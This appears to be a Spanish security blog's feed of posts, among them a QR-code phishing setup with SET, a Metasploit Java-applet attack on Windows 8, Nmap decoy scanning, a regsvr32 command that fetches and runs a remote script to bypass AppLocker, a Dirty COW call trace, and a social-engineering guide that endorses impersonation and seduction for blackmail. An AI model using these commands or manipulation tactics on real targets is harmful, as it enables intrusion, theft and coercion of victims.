Quantcast
Channel: PeruCrack
Viewing all 40 articles
Browse latest View live

Ataque por medio de código QR

September 12, 2014, 4:42 am
$
0
0
Todos somos conscientes del rápido crecimiento de los dispositivos móviles ya es sabido por muchos que actualmente toda nuestra información se encuentra almacenada en esta clase de dispositivos ya sea en un celular, una tablet, un localizador, etc. Por ello, y como muchas veces lo hemos visto en la comunidad, tiende a crecer los ataques a esta clase de equipos y en consecuencia el desarrollo de aplicaciones maliciosas. Las consecuencias de que a un usuario le pirateen su teléfono van desde que puedan espiarlo, robarle información o acceder a su agenda de contactos, por poner solo algunos ejemplos. Y lo peor de todo es lo fácil que resulta hacerlo.




Hace poco volví a repasar los capítulos de la serie de Discovery Max "Mundo Hacker TV" y en el capitulo relacionado a "Seguridad en Redes Moviles" tocan un tema muy interesante. Se trata de una puesta a prueba donde un supuesto atacante coloca un cartel en un centro comercial con un código QR de una supuesta super promoción y al escanearlo con la cámara del celular este lo llevaba a a una aplicación maliciosa, me pareció entretenido si desean pueden verlo en el siguiente video : 





Me quede con las ganas de ponerlo a prueba y recordé que la poderosa herramienta "SET" trae consigo una suite para poder realizar este tipo de ataque en donde con un poco de ingeniería social se puede robar gran cantidad de información.

En primer lugar vamos a definir algunos términos que usare en este articulo  :

Código QR : Un código QR (quick response code, «código de respuesta rápida») es un módulo útil para almacenar información en una matriz de puntos o un código de barras es decir puedo almacenar un enlace a un sitio web mediante el uso de este tipo de código, son estas imágenes que seguro conocen.

Aplicacion APK : En el caso de dispositivos android el formato del paquete instalador de aplicaciones se le conoce como apk (Application PacKage File).

Con todo esto listo y con muchas ganas vamos a poner a prueba este Hack-Lab :


Para empezar abrimos nuestro Kali Linux y en la consola escribimos: setoolkit




Nos aparecerá el menú de opciones de esta potente e intuitiva herramienta.

Luego nos dirigimos a la siguiente opción :

1) Social-Engineering Attacks
9) QR code generator Attack vector
Nos pedira introducir la pagina donde queremos dirigir al escanear el codigo con el celular.




Ahora solo quedaria mover nuestra imagen del codigo QR

cp /root/.set/reports/qrcode_attack.png /root/Desktop

Podremos enlazar al codigo QR algun sitio malicioso para moviles, alguna aplicacion apk con el fin de obtener datos einfectar a la victima ya todo depende de la ingenieria social.

Xander

Search

Me descargue un virus para android

September 20, 2014, 1:08 pm
$
0
0
Recientemente me descargue una aplicación para mi móvil desde un foro sobre desarrollo en android el cual contenía un archivo .apk zipeado así que me tome la molestia de analizarlo antes de poder probarlo y ejecutarlo.


(Application PacKage Files APK  un paquete para el sistema operativo Android. Este formato es una variante del formato JAR de Java y se usa para distribuir e instalar componentes empaquetados para la plataforma Android para smartphones y tablets) 


En primer lugar, me puse a analizar el archivo en www.virustotal.com y segun el md5 nos revela que efectivamente se trata de un virus

https://www.virustotal.com/es/file/bed05d8eace6a7ebc5dec7141ea4b9cc559f1b2aab8848e2c79df7a79de39b9d/analysis/



Pero como siempre es bueno conocer el origen del archivo, me puse a analizarlo para ello debia emplear apktool el cual pueden descargarlo aqui
luego ejecutamos el siguiente comando :

apktool d foo.apk



 Este comando permitirà crear una capeta con varios archivos entre los cuales esta >AndroidManifest.xml".el cual permitirá saber los permisos que solicita esta aplicación, adicionalmente podemos descompilarla, este paso lo que hara es ayudarnos a obtener el .jar para ello usamos el programa dex2jar el cual puede ser descargado aqui

dex2jar.bat foo.apk



Ahora ya tenemos la aplicación en .jar ahora podemos analizar el codigo para eso usamos el Java Decompiler el cual podemos descargarlo aqui





Acá podemos ver el código descompilado



Adicionalmente, pude analizar el origen y hacia donde apuntaba este malware :




Pueden descargar y analizar este .apk desde aquí.


 Xander

Top 5 usos que le puedes dar a Nmap

March 29, 2015, 2:19 am
$
0
0
Nmap es una de las herramientas mas usadas por los profesionales de sistemas en general, es quizás la herramienta mas útil a la hora de escanear redes en multi plataformas y sobretodo, usando algunos parámetros, encontrar equipos con ciertas características como puertos abiertos, servicios activos, etc. 




Así que les traigo aquí 5 usos que le puedes dar al Nmap en tu día a día :


Antes que nada es necesario tenerlo descargado y para ello visitaremos la pagina oficial del proyecto 
en donde podemos descargar la aplicación para muchas plataformas. 



Puesto 5 : 

Hacer ping a cierto rango de red para ello es necesario hacer uso del siguiente comando 

nmap -sP 192.168.1.100-254

 Esta opción permitirá conocer los host activos de un cierto rango.


 Puesto 4 : 

Es posible listar servidores con un puerto especifico abierto, esta opción lo he usado muchas veces al hacer algunas pruebas de seguridad en modo pasivo y verificar de una lista de servidores cuales tienen habilitada la gestión web. El argumento es el siguiente :  

nmap -sT -p 80 -oG – 192.168.1.* | grep open

-p : Indica el puerto que deseas analizar




Puesto 3 : 

A la hora de administrar una red y asignar una direccion IP a algun usuario es necesario saber si esta esta siendo usada, de esta manera evitaremos un conflicto de IP que puede ocasionar algun problema dentro de nuestra red. Para ello podemos usar el siguiente parametro para conocer que IPs estan disponibles en la subred.

nmap -T4 -sP 192.168.2.0/24 && egrep “00:00:00:00:00:00″ /proc/net/arp

Puesto 2 :  

Seguro se te ha ocurrido hacer un escaneo de puertos sin ser detectado, esto para un fin "educativo" sin embargo podemos escanear una red sin ser detectados usando el siguiente parámetro :

sudo nmap -sS 192.168.0.10 -D 192.168.0.2

Puesto 1 :

Es posible obtener toda la información posible de un host remoto (equipo o servidor) simplemente debemos usar el siguiente comando

nmap -sS -P0 -sV -O -y -A 192.168.1.2
Podemos cambiar la ip por la que queramos

-sS = Da inicio a un escaneo pasivo
-P0 = Evita el envió de mensajes ICMP
-O = se intenta identificar el Sistema Operativo
-sV = Detecta  versiones
-A =habilita OS fingerprinting y detección de versión
-v = intenta obtener mas detalles


Así que ya conocen 5 nuevos usos que le pueden dar a esta herramienta..

Saludos!

Hackear Windows 8 usando Metasploit

April 12, 2015, 8:14 pm
$
0
0
Hace tiempo quería escribir sobre una técnica para explotar en Windows 8 usando nuestro querido Metasploit y pues pensé hacerlo antes que se haga el común la versión 10 y pues aquí esta :





Lo primero que haremos es abrir la consola de Metasploit usando msfconsole , esperamos que nos salga las típicas figuras que nos presenta esta herramienta y luego escribimos lo siguiente :






use multi/browser/java_signed_applet





Si.. explotaremos una vulnerabilidad en Java...


 Ahora vamos a definir los parámetros de ip,puerto,etc yo en este caso usare uno 1337

set SRVPORT [Port number]
Cambiaremos también URIPATH, que por defecto es un string aleatorio, haremos que la victima se dirija a la raiz del server:



Ahora ejecutaremos el comando exploit


 Con todo esto iniciamos el server web local en 192.168.247.127:1337 enviando la url a la victima :

La victima aceptara la petición para ejecutar java en el navegador, aqui ya depende de la ingenieria social que uses..

En este punto solo nos queda esperar y cuando la victima ejecute el Java la sesion de meterpreter se activara


Con esto tendremos acceso a la PC








Saludos!!


Hackeando humanos : Influencia y manipulación para la Ingeniería Social

May 3, 2015, 2:39 pm
$
0
0
Este es quizás el articulo mas controversial de mi blog, pero quisiera mostrarles mediante ejemplos el poder de la Ingeniería Social, una de las herramientas mas poderosas para conseguir información a la cual no estamos autorizadas , es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes informáticos, para obtener información, acceso o privilegios en sistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos.



Esta es una de las ramas del hacking que es mi favorita y usándolo genialmente se puede evidenciar que es incluso aun mas poderosa que cualquier herramienta de pentesting. Me gustaría plantear dos términos muy importantes y de esta manera explicar de una manera mas clara lo que podemos hacer con esto. Muchas veces, la palabra influencia y manipulación son arrojados alrededor indistintamente. En esta publicación me gustaría pasar algún tiempo discutiendo influencia y manipulación y comparar y contrastar los dos., ejemplificando algunos casos de uso ¿Cuándo se debe utilizar la manipulación? ¿Qué es más beneficioso? ¿Hay efectos negativos asociados con ambos? Los dos conceptos están estrechamente relacionados y que para el común de las personas pueden aparecer los mismos. Comencemos por la definición de los dos términos : 

Influencia : La influencia es el proceso de conseguir que otra persona quiera, piense, reaccione de la forma en la que uno desee. Fuente: Chris Hadnagy, "Ingeniería Social: El arte de hacking humano"
Manipulación : Se puede definir como ejercer influencia tortuosa para el propio beneficio. 




Ahora que hemos definido estos términos vamos a introducirnos mas a cada uno de ellos y de esta manera ejemplificar las maravillas que podemos conseguir con todo esto. 



Influencia : 

La influencia puede venir de la mano con muchos otros términos los cuales en conjunto enriquecen el acto. 

Influencia + Reciprocidad : La reciprocidad se puede resumir simplemente como la "regla de oro" o tratar a los demás como te gustaría ser tratado. Cuando le damos a alguien un regalo, es natural que se sienten en deuda con nosotros. Este sentimiento de endeudamiento provoca reciprocidad en su objetivo y los hace mucho más probable que cumpla una solicitud. 

Vamos a poner un ejemplo : Yo hago un favor previo a un encargado de sistemas, un favor que previamente yo sè que el necesita, en ese momento esta persona se siente en deuda conmigo para luego yo pedirle otro favor inmediatamente en la cual puede estar lo que estoy buscando :  "Puedes pasarme la lista de correos de..""Puedes darme acceso a tal sistema solo un rato.." 
Hay un articulo muy interesante en este enlace "Dar para recibir"






Influencia + Obligación : La obligación principal es muy similar a la reciprocidad, pero en lugar de sentirse en deuda con alguien y la necesidad de devolver el favor, la sensación se genera a partir de verse obligado social o  legalmente a responder. Por ejemplo, decir "gracias" cuando alguien dice algo agradable es un ejemplo de obligación provocada por las normas sociales. ¿Cómo podemos usar obligación como un ingeniero social? Simplemente hacer una pregunta. Su objetivo, al ser interrogado, se sentirá la obligación de responder. Sería muy extraño si le preguntas a alguien algo y que ese objetivo solo permanezca en silencio mirándolo a usted.. ¿Es muy extraño no? Su objetivo se sentirá obligado a divulgar también alguna información.

Se me ocurre un ejemplo...Recuerdo hace unos años en una conversación con el encargado de sistemas de un reconocido banco del pais le pregunte fríamente algunos datos de la infraestructura de su red a lo que el respondió casi por instinto la marca y su principal proveedor de firewall, como buenos ingenieros sociales no tenemos que tener temor a preguntar


Influencia + Concesión :  


Concesión es el acto de renunciar a algo que quieres, o parecer que desee, por lo que su objetivo renuncie a algo que ellos quieren. Esta técnica se utiliza todos los días en las ventas. Una buena manera de utilizar concesión es comenzar con un pedido grande. Algo mucho más de lo que realmente quieres. Cuando su objetivo declina, usted dice: "ok, ¿qué tal esto ..." y le pide algo más pequeño a su alcance. Solo es psicología humana :)



Influencia + Autoridad : 

Se nos enseña desde pequeños a respetar la autoridad y para escuchar a los que están en posiciones de autoridad sobre nosotros. Como ingeniero social, posicionarse como una autoridad por encima de su objetivo puede ser de gran ayuda. Se me ocurre algo :


Que les parece...Llamar a un empleado del centro de llamadas fingiendo  ser un miembro Senior IT, o guardia de seguridad y pedirle iformacion confidencial. El tono de voz, la ropa, el lenguaje corporal, y puesto de trabajo son todas las cosas que un ingeniero social puede utilizar para ganar influencia a través de la autoridad.

Manipulación : 



Influencia y manipulación están estrechamente vinculados, la diferencia es cuando un ingeniero social utiliza la manipulación, el objetivo es introducir el estrés, la ansiedad o malestar a su objetivo en un esfuerzo por lograr el objetivo deseado. Es importante señalar que si bien las tácticas de manipulación trabajan, a menudo de manera muy eficaz, introducen su blanco a los sentimientos negativos. Estos sentimientos negativos hacen que sea extremadamente difícil continuar utilizando el blanco como fuente de información. Si su objetivo es utilizar su objetivo como una fuente permanente de información confiable les advierto que se debe tomar precaución del uso que se le de.

Del mismo modo que la influencia, la manipulación puede ir de la mano con diferentes tecnicas que a lo largo de mi experiencia he analizado.

El aumento de la susceptibilidad :



Muchas veces bajo estrés, la gente va a ser más susceptibles a la sugestión y la manipulación. Como ingeniero social, tendrá que aumentar el nivel de estrés de tu objetivo, alterando sus emociones. El miedo y la ira son emociones que son buenos en el aumento de la tensión en un objetivo.

Control ambiental : 

Control ambiental se refiere a la manipulación de su entorno bajo falsos pretextos que provocarían su objetivo de actuar de una manera que él o ella normalmente no se comportaría. Por ejemplo, el uso de una mujer sexualmente atractiva para seducir y tal vez participar en la actividad sexual (especialmente si el objetivo es casado) . El fin aquí es la extracción de información e incluso chantaje.


Como han podido entender en este articulo muchas veces el eslavon mas débil de la cadena de seguridad de cualquier sistema es el propio ser humano y podemos aprender a hackearlo sin la necesidad de atravesar barreras de costosas herramientas de seguridad, como ya lo saben el hacker mas famoso del mundo dijo que su mayor habilidad radicaba en la ingeniería social...



Diplomados gratuitos online ofrecidos por Google

October 25, 2015, 1:31 pm
$
0
0
Cuando me entere que Google estaba ofreciendo varios  cursos y diplomados de manera gratuita que incluía certificado pensé que solo se trataba de unas breves explicaciones sobre los productos que Google ofrece, sin embargo al decidir revisarlos me lleve la sorpresa que son cursos de alta calidad y muy bien adaptados a la tendencia actual. Les comparto en detalle cada uno de ellos y espero lo difundan de la mejor manera. 
Realmente recomiendo que vean cada uno de los diplomados en el orden que deseen y traten de captar todos los dettales, recuerden que hay la posibilidad de llegar la certificación y que tienen fecha limite.




En primer lugar, les comparto información sobre los Diplomados :




¿En qué consisten los cursos de Google?

Los cursos que veremos a continuación son producto del esfuerzo de muchas instituciones educativas que vienen trabajando con el programa Actívate para brindar todo el soporte de estos programas educativos.Todos los diplomados cuentan con módulos de enseñanza que debemos seguir progresivamente. Cada unidad cuenta con una pequeña evaluación que debemos responder para corroborar que hemos aplicado con eficiencia los conocimientos adquiridos.

¿Quiénes pueden participar?

Los diplomados ofrecidos por Google está disponibles para el público en general. Cualquier usuario con una cuenta en Google puede inscribirse de forma gratuita sin la necesidad de incluir ningún dato adicional. Gracias a la asociación entre Google, el Gobierno de España y Actívate podemos registrarnos automáticamente con nuestra cuenta de Google.


¿Qué necesito para obtener el diploma?


Para obtener el diploma deben cumplirse los siguientes requisitos obligatorios: aprobar los exámenes de cada unidad con un mínimo de 75% de aciertos, tener la cantidad mínima de medallones por cada evaluación, y por supuesto, aprobar la evaluación final del curso.Los alumnos tendrá hasta tres oportunidades para realizar la evaluación. De fallar en los tres intentos no podrás recibir el certificado final.

¿Quién otorga el certificado?

Si bien Google es el principal patrocinador de estos diplomados gratuitos, el certificado final es expedido por diferentes instituciones y universidades españolas.


Estos son los DIPLOMADOS ofrecidos por Google :  Para mayor detalle deben hacer click en cada titulo : 




Auspiciado por: Google y Gobierno de España
Contenido: curso gratuito para conocer nociones básicas y elementales sobre el Marketing Digital
Duración: 40 horas aprox.
Título del certificado: Marketing Digital emitida por la IAB (Interactive Advertising Bureau).
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015




Auspiciado por: Google y Gobierno de España
Contenido: aprende a interpretar y analizar los datos del tráfico web de tu página o blog.
Duración: 40 horas aprox.
Título del certificado: Analítica de Datos acreditado por la Escuela de Organización Industrial
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015






Auspiciado por: Google y Gobierno de España
Contenido: curso explorativo para conocer cómo implementar la tecnología para reducir costes en tu negocio.
Duración: 40 horas aprox.
Título del certificado: Cloud Computing acreditado por la Escuela de Organización Industrial
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015




Auspiciado por: Google y Gobierno de España
Contenido: aprende a diseñar un proyecto empresarial para cumplir con todos los objetivos generales y específicos propuestos.
Duración: 40 horas aprox.
Título del certificado: Emprendimiento acreditado por IEI de la Universidad de Alicante
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015





Auspiciado por: Google y Gobierno de España
Contenido: descubre una serie de herramientas y utilidades para ser más productivo al momento de estudiar, buscar un trabajo o realizar distintas actividades cotidianas.
Duración: 40 horas aprox.
Título del certificado: Productividad Propia acreditado por la Fundación Santa María la Real
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015







Auspiciado por: Google y Gobierno de España
Contenido: curso introductorio para conocer a fondo las nuevas directrices de Google para el diseño de págins web de manera profesional.
Duración: 40 horas aprox.
Título del certificado: Desarrollo Web acreditado por IEI de la Universidad de Alicante
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015





Auspiciado por: Google y Gobierno de España
Contenido: este curso te enseña a llevar tu negocio tradicional a la plataforma online para ampliar tu mercado a nuevos horizontes.
Duración: 40 horas aprox.
Título del certificado: Comercio Electrónico acreditado por la Escuela de Organización Industrial
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015




Auspiciado por: Google y Gobierno de España
Contenido: descubre habilidades y conceptos preliminares de programación para el desarrollo de aplicaciones móviles.
Duración: 40 horas aprox.
Título del certificado: Desarrollo de Apps acreditado por la Universidad Complutense de Madrid
Fecha límite: el curso se imparte hasta el 31 de diciembre 2015

Realmente recomiendo que vean cada uno de los diplomados en el orden que deseen y traten de captar todos los dettales, recuerden que hay la posibilidad de llegar la certificación y que tienen fecha limite. Para los otros 20 cursos que esta dictando Google lo haré en otro articulo para poder mantener el orden y debido a que es de una temática distinta que estoy seguro le gustara a los desarrolladores. 


Que es un Malware Script y como evitarlos

October 28, 2015, 3:06 am
$
0
0
En este post describimos algunas características del malware scripting para llegar a entender por qué estos lenguajes de programación se han convertido en una herramienta utilizada por los cibercriminales, las posibilidades que ofrece sobre un sistema comprometido y cómo es posible protegerse de este tipo de códigos maliciosos.


¿Qué son los script y qué los diferencia de los archivos ejecutables (.EXE)?



Los scripts son programas generalmente pequeños y simples, utilizados para automatizar tareas específicas. Contienen un conjunto de instrucciones que deben de ser interpretadas línea a línea en tiempo real; esta es la diferencia que presentan con otros programas que deben estar compilados en un archivo binario ejecutable (.EXE) para poder correrlos.

¿Por qué los cibercriminales utilizan este tipo lenguajes?

La respuesta es sencilla: los scripts tienen la capacidad de interactuar y hacer uso de las librerías o recursos del sistema operativo de una manera muy simple. Además, no tienen la necesidad de compilar el código para poder ser ejecutados.Particularmente Javascript y Visual Basic Script son los lenguajes preferidos por los atacantes, porque además de estar enfocados en el desarrollo web, pueden ser utilizados en sistemas operativos Windows.

De esta manera, con unas pocas líneas de código, un atacante puede desarrollar un troyano que será interpretado por el proceso “Windows Script Host”, que al ser legítimo del sistema operativo, no va a ser considerado malicioso.

Algunos de los códigos maliciosos más vistos en Latinoamérica son VBS/TrojanDownloader, VBS/Agent.NDH y JS/Bondat. Estos dos últimos son scripts más elaborados y a su vez más robustos, y por las características que tienen, el hecho de que alguno se ejecute en un equipo significaría que forma parte de una botnet.



Para poder llegar al punto de infección mencionado, los atacantes -como en cualquier otro tipo de campaña maliciosa- hacen uso de técnicas de Ingeniería Social para que el usuario descargue y ejecute el script, y así se logre la infección.


¿Cómo evitar que este tipo de códigos se ejecute en un equipo?

Permitir o no la ejecución de scripts depende en gran medida del uso que le den los usuarios a este tipo de archivos, sea en tareas de desarrollo, trabajo cotidiano o una simple automatización.
La forma de impedir que los scripts logren ejecutarse es agregando dos llaves en el registro de Windows :)


1.- Ingresamos al "regedit" a través de la ejecución del mismo (Windows + R) o en la raíz de la carpeta Windows\regedit.exe
2.- Luego buscamos las llaves de registro en estas rutas  HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings y HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings
3.- Hacemos click derecho sobre cada una de ellas y seleccionamos un nuevo "Valor de Cadena" y colocamos de nombre ""Enabled" posterior a eso le damos click derecho a cada registro creado y le damos en "Modificar" y le asignamos el valor de "0" esto ultimo es para desactivar la ejecucion automatica de esta clase de archivos

Los registros deben quedar así : 





Luego de esto si se ejecuta un script de manera automatica saldrá el siguiente mensaje : 




Saludos!

Genera claves seguras para tu red WPA/2 con KurtM

October 29, 2015, 2:55 am
$
0
0
A veces resulta complicado escoger una buena clave para nuestra red Wifi que nos brinde la sensacion de seguridad, ya hemos visto en anteriores publicaciones como funcionan este tipo de cifrados y contraseñas, sin embargo deseo compartir con ustedes la pagina KurtM la cual te permite escoger entre una serie de posibilidades la autogeneracion de claves que puedes usar para proteger tu red


1.- Ingresamos a KurtM

2.- Nos puestra el siguiente panel en donde podemos escoger el tipo de seguridad que queremos autogenerar


3.- Con la clave autogenerada ya podemos configurar nuestro AP :)

Lo que me gusta de esto es que a diferencia de otros autogeneradores aquí nos brindan el código fuente usado para poder analizarlo :) 



Nota : El codigo de generacion de llave aleatoria ha sido desarrollado por el Team WareWolf el codigo es libre y pueden descargarlo AQUI :)
Search

Interpretando los resultados de una deteccion de Virus en tu PC

October 30, 2015, 3:42 am
$
0
0
Muchas veces a la hora de correr un análisis de virus en búsqueda de amenazas dentro de nuestra PC nos topamos desagradablemente con resultados que a veces ni los entendemos y se nos da tan solo por dar click en "Eliminar Amenazas". Sin embargo, soy de los que les gusta saber mas e investigar que es lo que este "Virus" ha estado haciendo a mi PC y también por que razón entro. En esta publicación analizaremos el primer punto. 



Analizando la estructura : 

Esta información es útil para interpretar los resultados arrojados por los diferentes Antivirus e incluyendo el de VirusTotal. Al conocer los nombres de detección se puede obtener información sobre las muestras y estimar la probabilidad de falsos positivos.




Vamos a concentrarnos en un orden, el cual es usado por la mayoría de los AV, basado en ciertos patrones repetitivos :


Plataforma, Tipo, Nombre y Variante

Voy a tomar como ejemplo el resultado arrojado por ESET NOD 32 al momento de detectar una amenaza :
Win32/Spy.Zbot.ABW
Como pueden ver aquí cada uno de los componentes esta separado por una razón y eso es justo lo que quiero explicar en este post :)


Plataforma : 

Esto puede especificar el sistema operativo y la arquitectura que el malware se ejecuta, por ejemplo, Unix , Win32 , Win64. Pero también puede especificar el lenguaje de programación en  que el archivo fue escrito. A veces se utilizan plataformas de paraguas , por ejemplo, la plataforma puede ser " genérico " (sin plataforma especificada ) Aqui les pongo algunos ejemplos :


  • PHP
  • Java
  • Powershell
  • Win64
  • Win32
  • MSIL
  • Generic
  • Script

Tipo : 

Este elemento especifica el tipo de virus al que hemos sido expuestos, es bastante comun que usen este tipo de nombres :

  • Trojan
  • Downloader
  • Dropper
  • Spy
  • Virus
  • Worm
  • Application
  • Adware
  • PUP
  • PUA
Puedo hacer un paréntesis a los últimos 4 ejemplos para indicar que a veces se presenta este tipo de de archivos indeseados que en realidad son nombres generales y que por alguna razon han parado en la lista negra de los motores de antivirus mas conocidos. 


Nombre : 

El nombre de malware suele ser el nombre de la familia a la que pertenece . Pero hay un montón de ocasiones en donde usan nombres mas genéricos los cuales son matcheados con una base de datos respectiva. 

Variante : 

El Malware a menudo evoluciona con el tiempo . Ya sea porque el autor agrega mas funcionalidades o  cuando cambia partes de su código para evadir la detección. Estas versiones modificadas se convierten en variantes del malware originales . Todas las variantes de un malware pertenecen a una familia de malware , que se indica con el nombre de malware.

Informacion Adicional : 

A veces puede traer información adicional que nos permita conocer un poco mas sobre el dichoso Malware. Por ejemplo pueden mostrar un sufijo o prefijo que denota si un archivo se detectó genérica o heurísticamente. Estos términos dicen algo acerca de cómo se hizo la decisión para detectar el archivo


Nombres genéricos : 


Los nombres por defecto son diferentes para cada proveedor y son creados por lo general para las entradas añadidas de forma automática; a veces pueden ser añadidos por los analistas de malware si no quieren pensar en un nombre propio. 

Nombres predeterminados típicos son Agent o Generic y en su mayoria son colocadas en Trojanos : 

Trojan.Generic.KD.87847
Trojan.Win32.Generic!BT
Trojan ( 00071a9a1 )
Artemis!5EAC6EABC66A
Win.Trojan.Agent-691724
Gen:Variant.Zusy.53898
UnclassifiedMalware

Detección basada en análisis genérico y en heuristica : 


Las detecciones basadas en un analisis generico por su mayoria trabajan en base a una revision superficial sobre los nomre y tipo de familias de malware encontradas en una PC, en su mayoria arroja resultados denominados falsos-positivos. 




La heuristica basa su control en relación al comportamiento malicioso de algún proceso o archivo y hace un estudio enfocado a tal problema, esto es lo que hace que un AV sea inteligente o no, tambien es importante indicar que a veces el abuso de esta clase de "inteligencia" hace que una PC pueda correr "lento" ya que para hacer seguimiento a tal fin hace falta el consumo de recursos extra. 

Aqui un ejemplo de un resultado de virus encontrado mediante Heuristica
BehavesLike.Win32.Dropper.cc
Gen:Backdoor.Heur.FU
Win32.Trojan-Ransom.CryptoWall.D@gen
Gen:Win32.Necurs
Gen:Variant.Dyzap.13 

Saludos!

¿Qué es el modelo OSI?

November 12, 2015, 10:54 pm
$
0
0
El modelo de referencia OSI -Open System Interconnection- es la forma en que la ISO -International Standards Organization- ve las etapas en que se desarrolla un proceso de comunicaciones en redes de datos. El modelo resulta algo tedioso pero en este video te lo explico :)









Acá les dejo el vídeo :

https://www.youtube.com/watch?v=jQHHDUgKvPk


Explicando el modelo TCP/IP y analizandolo con Wireshark

November 13, 2015, 11:00 pm
$
0
0
El modelo TCP/IP describe un conjunto de guías generales de diseño e implementación de protocolos de red específicos para permitir que un equipo pueda comunicarse en una red. TCP/IP provee conectividad de extremo a extremo especificando como los datos deberían ser formateados, direccionados, transmitidos, enrutados y recibidos por el destinatario. 






Aquí te lo explico en vídeo :)











Pueden ver el video en este enlace :


https://www.youtube.com/watch?v=iLLkw4kFzO8

Whatsapp agrega cifrado a las conversaciones ¿Es posible espiar los mensajes?

April 11, 2016, 2:07 am
$
0
0
Si usas la versión más reciente de WhatsApp, puedes estar tranquilo de que tu comunicación está segura y que ningún par de ojos curiosos la podrá ver... o si?





El cifrado usado es conocido como End-to-End, este cifrado extremo a extremo ha comenzado a activarse a todos los usuarios. Cuando nos registramos en WhatsApp se intercambian una serie de claves con los servidores, de manera que quedamos autenticados ante él. Utilizando dichas claves, cada vez que iniciamos un chat, una llamada o cualquier otra comunicación, se genera una clave única por cada elemento de manera que todo el tráfico queda cifrado extremo a extremo y permanece cifrado incluso en los propios servidores de WhatsApp, impidiendo que estas puedan ser descifradas.





Para llevar a cabo este cifrado se utilizan los siguientes elementos:

Claves públicas

  • Identity Key Pair: Una clave de larga duración Curve25519, generada en el momento de la instalación.
  • Signed Pre Key: Una clave de duración media Curve25519, generada durante la instalación, firmada por la Identity Key Pair y que cambia con el tiempo.
  • One-Time Pre Keys: Una lista de claves Curve25519 de un solo uso, generadas durante la instalación y reemplazadas según sea necesario.


Claves de sesión 

  • Root Key: Una clave de 32-bytes utilizada para crear las Chain Keys.
  • Chain Key: Una clave de 32-bytes usada para crear las Message Keys.
  • Message Key: Una clave de 80-bytes usada para cifrar todo el tráfico de las comunicaciones


Nuestra informacion ahora es confidencial ?

Si y No, Whatsapp ya ha confesado que hay ciertas cosas que continúan observando, por ejemplo los números de teléfono origen-destino continuaran almacenados en los servidores de whatsapp de manera liro, asi mismo la hora y fecha de envío de mensajes continuará siendo de conocimiento de la corporación. 






Es posible espiar los mensajes? 

Un hacker puede recurrir a técnicas habituales como infectar el dispositivo con un troyano y lograr ver tus mensajes. Whatsapp no puede hacer nada contra esto, pero sí contra el pirateo directo por wifi o conexiones 3G o 4G, osea no podrá sniffear la red :)

Saltarse la protección de AppLocker de Windows con Regsvr32

May 3, 2016, 4:10 pm
$
0
0
Un investigador en seguridad de Colorado (Estados Unidos) llamado Casey Smith ha descubierto una característica en Regsvr32, la herramienta en línea de comando para registrar y quitar DLL y controles de ActiveX en el registro de Windows, que permite saltarse la seguridad de AppLocker, siendo esto último la característica que permite bloquear o poner en una lista blanca las aplicaciones y programas que pueden ejecutarse en el sistema.




Para saltarse la protección de AppLocker, Casey Smith ejecutó una línea de comando con Regsvr32 que apuntaba a un fichero alojado en un servidor remoto, aunque más tarde el propio investigador descubriría que también funciona con ficheros almacenados localmente. Lo peor de todo es que no se requiere de acceso como administrador para realizar este tipo de acciones, por lo que los usuarios de todo tipo están expuestos a este fallo de seguridad. Por otro lado el exploit no realiza ningún cambio en el registro del sistema.por lo que no dejara huella


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Regsvr32 es capaz de detectar la presencia proxies, utiliza TLS, sigue redirecciones e incluso es capaz de ejecutar binarios de Windows pudiéndose saltar la protección de AppLocker debido a que Regsvr32 está en su lista blanca, ya que es una función esencial del sistema.

Sin duda se trata de una vulnerabilidad bastante grave que requiere de la aplicación de un parche que sea publicado lo antes posible. Como medida de precaución se recomienda bloquear Regsvr32 y Regsvr64 con el firewall de Windows para evitar la ejecución de código y binarios en remoto a través de esas herramientas.

Escalando privilegios en Linux con Dirty Cow

November 6, 2016, 10:47 am
$
0
0
Recién me animo a escribir un articulo relacionado a esta famosa vulnerabilidad que ha sido reportada hace unas semanas (La cual ya existía desde hace años) relacionada a la manera como el kernel maneja los permisos en determinadas posiciones de memoria. Si, estoy hablando de Dirty Cow (Vease CVE-2016-5195)






Según quienes encontraron y reportaron esta vulnerabilidad se interpreta de la siguiente manera :

Se ha encontrado una condición de carrera en la forma en que el subsistema de memoria del Kernel de Linux administra la rotura de los mapeos de memoria de sólo lectura de tipo COW (copy on write). Un usuario local sin privilegios podría utilizar esto para obtener acceso a partes de la memoria que, de otra forma, serían de solo lectura para él.





Como les dije mas arriba esta vulnerabilidad ya lleva muchos años activa  (Algunos dicen que 9 años y que fue comentado en alguna ocasión por el mismo Linus Torvalds)


Como funciona ? La palabra clave aquí es escalada de privilegios

- El primer paso es mapear el proceso

- El segundo paso es mapear en memoria un archivo de acceso de sólo lectura.

- Tercer paso ejecutar los hilos en paralelo, vamos a escribir sobre el mapa de memoria con permisos de escritura y ademas que el kernel libere


En este vídeo podemos ver a DirtyCow en acción :



Aquí  PoC :)


faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
      do_cow_fault <- FAULT_FLAG_WRITE
        alloc_set_pte
          maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty
                                but keep it RO
# Returns with 0 and retry
follow_page_mask
  follow_page_pte
    (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault
faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        FAULT_FLAG_WRITE && !pte_write
      do_wp_page
        PageAnon() <- this is CoWed page already
        reuse_swap_page <- page is exclusively ours
        wp_page_reuse
          maybe_mkwrite <- dirty but RO again
          ret = VM_FAULT_WRITE
((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE
# Returns with 0 and retry as a read fault
cond_resched -> different thread will now unmap via madvise
follow_page_mask
  !pte_present && pte_none
faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
